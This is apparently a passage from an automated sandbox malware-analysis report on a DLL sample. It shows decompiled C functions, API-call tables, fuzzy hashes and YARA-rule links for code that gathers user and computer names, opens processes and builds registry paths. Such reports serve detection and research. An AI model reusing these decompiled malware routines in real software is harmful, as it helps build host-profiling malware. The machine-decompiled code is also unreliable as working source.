									_t31 = _t56 + 2; // 0xeca33a
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                                                  0x00ec7657
                                                  0x00ec765a
                                                  0x00ec765d
                                                  0x00ec7663
                                                  0x00ec7668
                                                  0x00ec766e
                                                  0x00ec7676
                                                  0x00ec7679
                                                  0x00ec767f
                                                  0x00ec7684
                                                  0x00ec7691
                                                  0x00ec769e
                                                  0x00ec76a2
                                                  0x00ec76a4
                                                  0x00ec76a8
                                                  0x00ec76ab
                                                  0x00ec76bb
                                                  0x00ec770d
                                                  0x00ec770e
                                                  0x00ec76bd
                                                  0x00ec76c0
                                                  0x00ec76c7
                                                  0x00ec76ca
                                                  0x00ec76dd
                                                  0x00000000
                                                  0x00ec76df
                                                  0x00ec76e2
                                                  0x00ec76e7
                                                  0x00ec76f5
                                                  0x00ec76f8
                                                  0x00ec7700
                                                  0x00ec7703
                                                  0x00000000
                                                  0x00ec7705
                                                  0x00ec7705
                                                  0x00ec7708
                                                  0x00ec7708
                                                  0x00ec7703
                                                  0x00ec76dd
                                                  0x00ec7713
                                                  0x00ec7714
                                                  0x00ec7684
                                                  0x00ec771a

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,00ECA338), ref: 00EC765D
                                                  • GetComputerNameW.KERNEL32(00000000,00ECA338), ref: 00EC7679
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • GetUserNameW.ADVAPI32(00000000,00ECA338), ref: 00EC76B3
                                                  • GetComputerNameW.KERNEL32(00ECA338,?), ref: 00EC76D5
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00ECA338,00000000,00ECA33A,00000000,00000000,?,?,00ECA338), ref: 00EC76F8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                  • String ID:
                                                  • API String ID: 3850880919-0
                                                  • Opcode ID: 23dd9b29b5ace8d0caade126c445a557c64a7be3196f04a4a652fbd9c11c9e4f
                                                  • Instruction ID: db62c8cb4c8d77ed92c8819a25971122713f0ae3d97e4658e297e36ff885c44e
                                                  • Opcode Fuzzy Hash: 23dd9b29b5ace8d0caade126c445a557c64a7be3196f04a4a652fbd9c11c9e4f
                                                  • Instruction Fuzzy Hash: 7C21D776900208FFCB11DFA9DA85DEEBBB8EF44304B6054AAE505E7201D7319F46DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC1585, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00EC1585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E00EC7F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E00ECA9AB(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0xecd130() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                  0x00ec1585
                                                  0x00ec1592
                                                  0x00ec1594
                                                  0x00ec15f7
                                                  0x00000000
                                                  0x00ec15f7
                                                  0x00ec15ac
                                                  0x00ec15b3
                                                  0x00ec15bf
                                                  0x00ec15c4
                                                  0x00ec15c6
                                                  0x00ec15c8
                                                  0x00ec15ca
                                                  0x00ec15cc
                                                  0x00ec15ce
                                                  0x00ec15da
                                                  0x00ec15ea
                                                  0x00000000
                                                  0x00ec15dc
                                                  0x00ec15dc
                                                  0x00ec15e3
                                                  0x00ec15f0
                                                  0x00ec15f0
                                                  0x00ec15f0
                                                  0x00ec15e3
                                                  0x00ec15da
                                                  0x00ec15f5
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec15fb

                                                  APIs
                                                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,00EC11DA,?,?,00000000,00000000), ref: 00EC15BF
                                                  • ResetEvent.KERNEL32(?), ref: 00EC15C4
                                                  • GetLastError.KERNEL32 ref: 00EC15DC
                                                  • GetLastError.KERNEL32(?,?,00000102,00EC11DA,?,?,00000000,00000000), ref: 00EC15F7
                                                    • Part of subcall function 00EC7F27: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,00EC15A4,?,?,?,?,00000102,00EC11DA,?,?,00000000), ref: 00EC7F33
                                                    • Part of subcall function 00EC7F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00EC15A4,?,?,?,?,00000102,00EC11DA,?), ref: 00EC7F91
                                                    • Part of subcall function 00EC7F27: lstrcpy.KERNEL32(00000000,00000000), ref: 00EC7FA1
                                                  • SetEvent.KERNEL32(?), ref: 00EC15EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1449191863-0
                                                  • Opcode ID: 1c6382f19703d74c926d75f0b8c5092d7ac28e130517e3028ee8eb2a1f33a5be
                                                  • Instruction ID: 6a1f764d69ac12538da74328dec802dd868c211efb80d7105b686afbbbad9a65
                                                  • Opcode Fuzzy Hash: 1c6382f19703d74c926d75f0b8c5092d7ac28e130517e3028ee8eb2a1f33a5be
                                                  • Instruction Fuzzy Hash: 3A01AD31104641AFD6306B32DE45F1BB6A8FF86368F205A3DF056B10F1DA22EC1B9A21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC7CB8, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 39stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00EC7CB8(void* __ecx, WCHAR* _a4, void* _a8) {
				void* _v8;
				int _t14;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t14 = lstrlenW(_a4);
				_t2 =  &_a8; // 0xec747c
				_t29 = _t14;
				_t25 = lstrlenW( *_t2);
				_t18 = E00EC2049(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}









                                                  0x00ec7cc8
                                                  0x00ec7cca
                                                  0x00ec7ccd
                                                  0x00ec7cd1
                                                  0x00ec7cdb
                                                  0x00ec7ce2
                                                  0x00ec7ce5
                                                  0x00ec7ce7
                                                  0x00ec7cef
                                                  0x00ec7cf4
                                                  0x00ec7d02
                                                  0x00ec7d07
                                                  0x00ec7d11

                                                  APIs
                                                  • lstrlenW.KERNEL32(004F0053,75145520,?,00000008,0300937C,?,00EC747C,004F0053,0300937C,?,?,?,?,?,?,00EC6814), ref: 00EC7CC8
                                                  • lstrlenW.KERNEL32(|t,?,00EC747C,004F0053,0300937C,?,?,?,?,?,?,00EC6814), ref: 00EC7CCF
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • memcpy.NTDLL(00000000,?,751469A0,?,?,00EC747C,004F0053,0300937C,?,?,?,?,?,?,00EC6814), ref: 00EC7CEF
                                                  • memcpy.NTDLL(751469A0,?,00000002,00000000,?,751469A0,?,?,00EC747C,004F0053,0300937C), ref: 00EC7D02
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                  • String ID: |t
                                                  • API String ID: 2411391700-1785604035
                                                  • Opcode ID: 5cc02497d873d99cbda21a9088b887f4e38b35211e26b9997d20b3954d738c8d
                                                  • Instruction ID: 6ac23061dcb9ed8c000cddc1af8ff016ea9887680b9abca6dea8d00e85e932c8
                                                  • Opcode Fuzzy Hash: 5cc02497d873d99cbda21a9088b887f4e38b35211e26b9997d20b3954d738c8d
                                                  • Instruction Fuzzy Hash: 6CF03C72900118BBCB11DFA9CD45DDE7BACEF093547114066FD08E7111E732EA159BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC8F10, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00EC8F10(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xecd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xecd25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0xecd258 = _t6;
					 *0xecd264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xecd254 = _t7;
					if(_t7 == 0) {
						 *0xecd254 =  *0xecd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                                                  0x00ec8f18
                                                  0x00ec8f20
                                                  0x00ec8f25
                                                  0x00000000
                                                  0x00ec8f7a
                                                  0x00ec8f27
                                                  0x00ec8f2f
                                                  0x00ec8f37
                                                  0x00ec8f37
                                                  0x00ec8f77
                                                  0x00000000
                                                  0x00ec8f77
                                                  0x00ec8f39
                                                  0x00ec8f39
                                                  0x00ec8f3e
                                                  0x00ec8f50
                                                  0x00ec8f55
                                                  0x00ec8f5b
                                                  0x00ec8f63
                                                  0x00ec8f68
                                                  0x00ec8f6a
                                                  0x00ec8f6a
                                                  0x00000000
                                                  0x00ec8f71
                                                  0x00ec8f33
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec8f35
                                                  0x00000000

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00EC6A90,?,?,00000001,?,?,?,00EC807D,?), ref: 00EC8F18
                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,00EC807D,?), ref: 00EC8F27
                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00EC807D,?), ref: 00EC8F3E
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00EC807D,?), ref: 00EC8F5B
                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,00EC807D,?), ref: 00EC8F7A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                  • String ID:
                                                  • API String ID: 2270775618-0
                                                  • Opcode ID: c1293509685d780a363abc040a72a2e9a983b33d122fe65d474fc115f58b9f40
                                                  • Instruction ID: 08aa6d87226109fdd38ee310c3c412bb1bef613cf9547741481047d328f23146
                                                  • Opcode Fuzzy Hash: c1293509685d780a363abc040a72a2e9a983b33d122fe65d474fc115f58b9f40
                                                  • Instruction Fuzzy Hash: 2CF04F70788385DEE7249F26AF1AF143B62A745784F20553DE186F62F0EA73844BCB15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC17D5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E00EC17D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0xecd33c);
					_t97 = 0x80000002;
					L6:
					_t60 = E00EC809F(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E00EC88B7(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E00EC9039(_a8);
						goto L29;
					}
					_t65 =  *0xecd27c; // 0x213a5a8
					_t16 = _t65 + 0xece8fe; // 0x65696c43
					_t68 = E00EC809F(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d00ecc0
						if(E00ECA635(_t103,  *_t33, _t97, _a8,  *0xecd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0xecd27c; // 0x213a5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0xecea5f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xece89f; // 0x55434b48
								_t73 = _t34;
							}
							if(E00EC816C(_t73,  *0xecd334,  *0xecd338,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0xecd27c; // 0x213a5a8
									_t44 = _t75 + 0xece871; // 0x74666f53
									_t78 = E00EC809F(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d00ecc0
										E00EC2659( *_t47, _t97, _a8,  *0xecd338, _a24);
										_t49 = _t107 + 0x10; // 0x3d00ecc0
										E00EC2659( *_t49, _t97, _t105,  *0xecd330, _a16);
										E00EC9039(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d00ecc0
									E00EC2659( *_t40, _t97, _a8,  *0xecd338, _a24);
									_t43 = _t107 + 0x10; // 0x3d00ecc0
									E00EC2659( *_t43, _t97, _a8,  *0xecd330, _a16);
								}
								if( *_t107 != 0) {
									E00EC9039(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d00ecc0
					if(E00EC6BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d00ecc0
							E00ECA635(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E00EC9039(_t106);
						_t104 = _a16;
					}
					E00EC9039(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E00ECA8D8(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0xecd33c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}























                                                  0x00ec17d5
                                                  0x00ec17de
                                                  0x00ec17e5
                                                  0x00ec17ea
                                                  0x00ec1857
                                                  0x00ec185d
                                                  0x00ec1862
                                                  0x00ec186b
                                                  0x00ec1872
                                                  0x00ec1875
                                                  0x00ec19e9
                                                  0x00ec19f0
                                                  0x00ec19f0
                                                  0x00ec19f5
                                                  0x00ec19f7
                                                  0x00ec19f7
                                                  0x00ec1a00
                                                  0x00ec1a00
                                                  0x00ec187b
                                                  0x00ec1887
                                                  0x00ec19df
                                                  0x00ec19e2
                                                  0x00000000
                                                  0x00ec19e2
                                                  0x00ec188d
                                                  0x00ec1892
                                                  0x00ec189b
                                                  0x00ec18a2
                                                  0x00ec18a5
                                                  0x00ec18ef
                                                  0x00ec18ef
                                                  0x00ec1902
                                                  0x00ec190c
                                                  0x00ec1914
                                                  0x00ec1919
                                                  0x00ec1923
                                                  0x00ec1923
                                                  0x00ec191b
                                                  0x00ec191b
                                                  0x00ec191b
                                                  0x00ec191b
                                                  0x00ec1945
                                                  0x00ec194d
                                                  0x00ec197b
                                                  0x00ec1980
                                                  0x00ec1989
                                                  0x00ec198e
                                                  0x00ec1992
                                                  0x00ec19c4
                                                  0x00ec1994
                                                  0x00ec19a1
                                                  0x00ec19a4
                                                  0x00ec19b4
                                                  0x00ec19b7
                                                  0x00ec19bd
                                                  0x00ec19bd
                                                  0x00ec194f
                                                  0x00ec195c
                                                  0x00ec195f
                                                  0x00ec1971
                                                  0x00ec1974
                                                  0x00ec1974
                                                  0x00ec19ce
                                                  0x00ec19da
                                                  0x00ec19d0
                                                  0x00ec19d3
                                                  0x00ec19d3
                                                  0x00ec19ce
                                                  0x00ec1945
                                                  0x00000000
                                                  0x00ec190c
                                                  0x00ec18b4
                                                  0x00ec18be
                                                  0x00ec18c0
                                                  0x00ec18c5
                                                  0x00ec18c9
                                                  0x00ec18cb
                                                  0x00ec18d6
                                                  0x00ec18d9
                                                  0x00ec18d9
                                                  0x00ec18df
                                                  0x00ec18e4
                                                  0x00ec18e4
                                                  0x00ec18ea
                                                  0x00000000
                                                  0x00ec18ea
                                                  0x00ec17ef
                                                  0x00000000
                                                  0x00ec1816
                                                  0x00ec1816
                                                  0x00ec1822
                                                  0x00ec1835
                                                  0x00ec183b
                                                  0x00ec1843
                                                  0x00000000
                                                  0x00ec1843

                                                  APIs
                                                  • StrChrA.SHLWAPI(00EC3C81,0000005F,00000000,00000000,00000104), ref: 00EC1808
                                                  • lstrcpy.KERNEL32(?,?), ref: 00EC1835
                                                    • Part of subcall function 00EC809F: lstrlen.KERNEL32(?,00000000,00ECD330,00000001,00EC2200,00ECD00C,00ECD00C,00000000,00000005,00000000,00000000,?,?,?,00EC96C1,#), ref: 00EC80A8
                                                    • Part of subcall function 00EC809F: mbstowcs.NTDLL ref: 00EC80CF
                                                    • Part of subcall function 00EC809F: memset.NTDLL ref: 00EC80E1
                                                    • Part of subcall function 00EC2659: lstrlenW.KERNEL32(00EC3C81,?,?,00EC19A9,3D00ECC0,80000002,00EC3C81,00EC8B1E,74666F53,4D4C4B48,00EC8B1E,?,3D00ECC0,80000002,00EC3C81,?), ref: 00EC2679
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00EC1857
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                  • String ID: \
                                                  • API String ID: 3924217599-2967466578
                                                  • Opcode ID: 5a0cbb9168586308fcdfc25bd7bbb0e1f96b71b10077c141b585debc34ae8970
                                                  • Instruction ID: 8f51bfc2ee4f2f8d1ce7e4afc009398692e489bcd8c1f6a7e0a15838f0223ef2
                                                  • Opcode Fuzzy Hash: 5a0cbb9168586308fcdfc25bd7bbb0e1f96b71b10077c141b585debc34ae8970
                                                  • Instruction Fuzzy Hash: 32515A32100209EFDF11AFA5DE41FAA37BAEB49304F149469FA15B2222D733D917AB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC396D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29sleepCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 16%
                                                  			E00EC396D(char* __esi) {
				char _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				intOrPtr _t9;
				char _t14;
				char* _t16;

				_t16 = __esi;
				_t4 =  *0xecd32c; // 0x30095b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xecd32c; // 0x30095b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t14 =  *_t16;
				if(_t14 ==  *_t16) {
					_t2 =  &_v0; // 0xec685f
					_t14 = _t14 + 1;
					if(_t14 >=  *((intOrPtr*)( *_t2 + 4))) {
						_t14 = 0;
					}
					 *_t16 = _t14;
				}
				_t9 =  *0xecd32c; // 0x30095b0
				__imp__(_t9 + 0x40);
				return _t14;
			}









                                                  0x00ec396d
                                                  0x00ec396d
                                                  0x00ec3976
                                                  0x00ec3986
                                                  0x00ec3986
                                                  0x00ec398b
                                                  0x00ec3990
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec3980
                                                  0x00ec3980
                                                  0x00ec3995
                                                  0x00ec3999
                                                  0x00ec399b
                                                  0x00ec399f
                                                  0x00ec39a4
                                                  0x00ec39a6
                                                  0x00ec39a6
                                                  0x00ec39a8
                                                  0x00ec39a8
                                                  0x00ec39aa
                                                  0x00ec39b3
                                                  0x00ec39bc

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(03009570), ref: 00EC3976
                                                  • Sleep.KERNEL32(0000000A,?,00EC685F,00000002,?,?,00EC2417,?), ref: 00EC3980
                                                  • RtlLeaveCriticalSection.NTDLL(03009570), ref: 00EC39B3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeaveSleep
                                                  • String ID: _h
                                                  • API String ID: 1566154052-4139817520
                                                  • Opcode ID: 452f18935c2237258548165b50412828cfeeb8424b8e44f55a72f86658554ea8
                                                  • Instruction ID: 8cda2856c5ae36d8b019b582800e199a897cd3c2a960edeabad084175d46804a
                                                  • Opcode Fuzzy Hash: 452f18935c2237258548165b50412828cfeeb8424b8e44f55a72f86658554ea8
                                                  • Instruction Fuzzy Hash: CAF08271A491C09FE3108F7ADD59E41BBE49B96380758D429E4C5E7226C273D84BCB25
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC52F9, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E00EC52F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xecd27c; // 0x213a5a8
					_t5 = _t102 + 0xece038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xecc2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xecd27c; // 0x213a5a8
												_t28 = _t108 + 0xece0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xecd27c; // 0x213a5a8
														_t33 = _t78 + 0xece078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                                  0x00ec52fe
                                                  0x00ec5307
                                                  0x00ec5308
                                                  0x00ec530c
                                                  0x00ec5312
                                                  0x00ec5318
                                                  0x00ec5321
                                                  0x00ec5327
                                                  0x00ec5331
                                                  0x00ec5333
                                                  0x00ec5339
                                                  0x00ec533e
                                                  0x00ec5349
                                                  0x00ec5351
                                                  0x00ec5354
                                                  0x00ec5477
                                                  0x00ec535a
                                                  0x00ec535a
                                                  0x00ec5367
                                                  0x00ec536d
                                                  0x00ec5373
